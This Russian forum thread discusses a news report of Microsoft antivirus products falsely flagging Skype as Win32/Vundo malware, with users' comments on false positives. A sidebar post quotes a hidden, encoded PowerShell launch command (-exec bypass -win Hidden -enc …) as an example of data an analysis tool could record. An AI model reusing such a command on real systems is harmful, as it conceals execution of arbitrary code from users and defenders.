Перейти к содержанию

Recommended Posts

Иван

ложные срабатывания у всех бывает, это не новость

но меня порадовало выделенное жирным, всего несколько дней это круто

Microsoft приняла Skype за вирус

Источник: Techlabs.ru (Москва)

Иногда ваши любимые программы могут по непонятной причине переставать запускаться, особенно это раздражает, когда приложение используется для Интернет-коммуникаций. С такой ситуацией недавно столкнулись владельцы антивирусных продуктов Microsoft, лишившихся возможности говорить по Skype. Выяснилось, что по ошибке антивирусы компании блокировали Skype, принимая VoIP-программу за вирус Win32/Vundo.gen!D. В числе источников, препятствовавших запуску Skype, оказались Microsoft Forefront Client Security, Windows Live OneCare и Windows Live OneCare Safety Scanner.

Благодаря специалистам Microsoft Malware Protection Center был обнаружен факт некорректного распознавания некоторых версий Skype как вредоносных программ. Сигнатуры с ошибкой поступили в загрузку 18 апреля, всего несколько дней потребовалось на исправление недочета, 21 апреля оплошность была устранена. Патч для ошибки содержится в сигнатурах версии 1.31.9121.0 и выше. В общем, если вы испытывали в последние дни проблемы с использованием Skype, следует незамедлительно нажать на кнопку обновления вашего антивируса, а после загрузки вновь приступить к разговорам по VoIP-коммуникатору.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Когда я получил РСС, то первая мысль была: "Покажите мне пальцем на тех, кто никогда не фолсил". А когда прочитал новость... даааа. Интересно, а если бы вы не осветили, кто-нибудь узнал был?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Иван

то что фолсф есть у всех это точно, но по личному опыту те же Доктор и ЛК исправляют их оперативней

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Остроту новости придает еще тот факт, что Skype - это конкурент Microsoft Office Live Meeting. Было бы логично в сообщение об обнаружении вредоноса в файлах Skype вставить ссылку типа "Скачать надежный аналог здесь" :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
spw
Иногда ваши любимые программы могут по непонятной причине переставать запускаться, особенно это раздражает, когда приложение используется для Интернет-коммуникаций. С такой ситуацией недавно столкнулись владельцы антивирусных продуктов Microsoft, лишившихся возможности говорить по Skype. Выяснилось, что по ошибке антивирусы компании блокировали Skype, принимая VoIP-программу за вирус Win32/Vundo.gen!D. В числе источников, препятствовавших запуску Skype, оказались Microsoft Forefront Client Security, Windows Live OneCare и Windows Live OneCare Safety Scanner.

Комичнее это бы смотрелось сейчас, когда Microsoft купил Skype :))

____

Почти "Итальянская забастовка". Я добрый, отзывчивый, культурный, все строго по правилам.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Sp0Raw

Все в порядке?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×